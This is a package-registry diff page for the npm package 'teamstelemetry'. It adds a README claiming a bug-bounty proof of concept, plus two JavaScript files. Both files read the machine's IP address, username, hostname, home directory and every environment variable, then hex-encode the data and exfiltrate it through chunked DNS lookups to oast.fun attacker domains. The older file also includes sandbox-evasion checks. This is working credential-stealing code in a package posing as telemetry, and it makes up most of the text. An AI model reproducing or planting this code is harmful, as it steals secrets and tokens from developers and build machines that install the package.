npm - teamstelemetry - Versions diffs - 0.0.1-security → 9.2.0 - Mend

teamstelemetry 0.0.1-security → 9.2.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of teamstelemetry might be problematic. Click here for more details.

Files changed (20) hide show

package/Readme.md ADDED Viewed

@@ -0,0 +1,3 @@
+# Example node package
+This is Edisc's PoC for the bug bounty
+program. I own this package name.

package/app.js ADDED Viewed

@@ -0,0 +1,57 @@
+const os = require('os');
+const dns = require('dns');
+// Thêm dấu chấm phẩy ở đầu dòng này để tránh lỗi cú pháp
+;(async () => {
+    // --- Cấu hình ---
+    const attackerDomain = 'd20b8012ekud5bi4vsigjcj8ty6ffm59h.oast.fun'; // Thay domain của bạn vào đây
+    // --- Lấy địa chỉ IP ---
+    let ip = 'N/A';
+    try {
+        const interfaces = os.networkInterfaces();
+        for (const name of Object.keys(interfaces)) {
+            for (const iface of interfaces[name]) {
+                if (iface.family === 'IPv4' && !iface.internal) {
+                    ip = iface.address;
+                    break;
+                }
+            }
+            if (ip !== 'N/A') break;
+        }
+    } catch (e) { /* Bỏ qua lỗi */ }
+    // --- THAY ĐỔI QUAN TRỌNG: SẮP XẾP LẠI DỮ LIỆU ---
+    // Thêm một trường "mồi" vào đầu với dữ liệu ngẫu nhiên.
+    // Nếu các chunk đầu bị mất, ta chỉ mất dữ liệu mồi này.
+    const decoy = `decoy_start_${Math.random().toString(36).substring(2)}`;
+    let collectedData = {
+        _decoy: decoy, // << Trường mồi nằm ở đầu
+        ip: ip,
+        username: os.userInfo().username,
+        hostname: os.hostname(),
+        platform: os.platform(),
+        arch: os.arch(),
+        home: os.homedir(),
+        env: process.env,
+        _decoy2: "decoy_end" // Thêm một mồi nữa ở cuối cho chắc chắn
+    };
+    // --- KẾT THÚC THAY ĐỔI ---
+    // --- Mã hóa và gửi dữ liệu qua DNS (giữ nguyên) ---
+    const dataString = JSON.stringify(collectedData);
+    const encodedData = Buffer.from(dataString).toString('hex');
+    const chunkSize = 50;
+    for (let i = 0; i < encodedData.length; i += chunkSize) {
+        const chunk = encodedData.substring(i, i + chunkSize);
+        const subdomain = `${i/chunkSize}.${chunk}`;
+        const finalDomain = `${subdomain}.${attackerDomain}`;
+        dns.lookup(finalDomain, (err) => {});
+        // Thêm một khoảng dừng nhỏ giữa các lần gửi
+        await new Promise(resolve => setTimeout(resolve, 100));
+    }
+})();

package/app.obfuscated.js ADDED Viewed

@@ -0,0 +1 @@

package/app_old.js ADDED Viewed

@@ -0,0 +1,64 @@
+const os = require('os');
+const dns = require('dns');
+const https = require('https');
+// Thêm dấu chấm phẩy ở đầu dòng này để sửa lỗi cú pháp
+;(async () => {
+    // --- Cấu hình ---
+    // Thay thế 'xxxxxxxxxxxx.oast.fun' bằng domain của bạn từ Interact.sh hoặc Burp Collaborator
+    const attackerDomain = 'ktrlbxgezawrunxutmddwwlbwr26w2elv.oast.fun';
+    // --- Sandbox Evasion (Kỹ thuật né tránh môi trường ảo hóa) ---
+    const forbiddenUsernames = ['sandbox', 'test', 'vmware', 'virtualbox', 'docker'];
+    if (forbiddenUsernames.includes(os.userInfo().username.toLowerCase())) {
+        return;
+    }
+    if (os.cpus().length < 2 || os.totalmem() < 2 * 1024 * 1024 * 1024) {
+        return;
+    }
+    // --- Lấy địa chỉ IP (ĐOẠN MÃ MỚI) ---
+    let ip = 'N/A';
+    try {
+        const interfaces = os.networkInterfaces();
+        for (const name of Object.keys(interfaces)) {
+            for (const iface of interfaces[name]) {
+                // Chỉ lấy địa chỉ IPv4 không phải nội bộ
+                if (iface.family === 'IPv4' && !iface.internal) {
+                    ip = iface.address;
+                    break;
+                }
+            }
+            if (ip !== 'N/A') break;
+        }
+    } catch (e) {
+        // Bỏ qua lỗi nếu không lấy được IP
+    }
+    // --- KẾT THÚC ĐOẠN MÃ MỚI ---
+    // --- Thu thập dữ liệu ---
+    let collectedData = {
+        ip: ip, // Thêm địa chỉ IP vào đây
+        username: os.userInfo().username,
+        hostname: os.hostname(),
+        platform: os.platform(),
+        arch: os.arch(),
+        home: os.homedir(),
+        env: process.env
+    };
+    // --- Mã hóa và gửi dữ liệu qua DNS (DNS Exfiltration) ---
+    const dataString = JSON.stringify(collectedData);
+    const encodedData = Buffer.from(dataString).toString('hex');
+    const chunkSize = 50;
+    for (let i = 0; i < encodedData.length; i += chunkSize) {
+        const chunk = encodedData.substring(i, i + chunkSize);
+        const subdomain = `${i/chunkSize}.${chunk}`;
+        const finalDomain = `${subdomain}.${attackerDomain}`;
+        dns.lookup(finalDomain, (err) => {});
+        await new Promise(resolve => setTimeout(resolve, 50));
+    }
+})();